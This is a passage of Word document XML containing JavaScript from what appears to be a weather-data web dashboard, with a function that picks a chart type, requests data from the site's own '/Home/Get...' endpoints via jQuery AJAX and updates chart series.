        <w:t xml:space="preserve">                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E20E0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695022E4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425765DC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB8B61" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404ED5A4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66C068" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF028BB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B574455" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>updateChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = function (type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE545C6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var chart;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB28F0E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026C290" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A02C3D1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        switch (type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271ED091"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64340185" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>Twind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B4A05"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TW";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C38194" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                chart = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4EC37C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AE5925"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2F9EA5E7"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Rh";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F5100"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PW";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E37526" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                chart = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartPwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11E7EE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB66FB"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6AAA9CFF"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pov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55DF8B"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TS";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6DA978" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                chart = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartTpov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B2F7F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5129D8E0"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4D71FCFD"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ind";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29035A2A"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PC";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6D873" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                chart = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>charWindSpeed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA696E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B5689" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273A63D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var a = "/Home/Get" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> + "Data1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD59DD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>tRadio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">("input[name=" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> + "]:checked");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D35BF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>tRadio.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173BEA6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            a = "/Home/Get" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> + "Data1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065AD1C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AEFDF7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        else if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>tRadio.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51AAB2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            a = "/Home/Get" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>actionStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> + "Data3";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E50D2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F602E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>$.ajax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D59A106" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            type: "GET",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028334A1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            url: a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86C8F8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            data: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8D30D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                date: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>calendarButton.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="002554FF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A61C0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>contentType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: "application/json; charset=utf-8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4D58C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>dataType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>: "json",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57413912" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            success: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnSuccessResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C373FE0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            error: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E9A7A7E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A395F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnSuccessResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57C642" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D962A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5687F9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartWindDirData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>temperatureChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB3691" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartWindDirData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>= null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B595416" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chart.updateOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB89AF"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8DDF988" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    categories: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56BAB317" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53756DA5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                series: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC292F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C4CC8A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        data: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
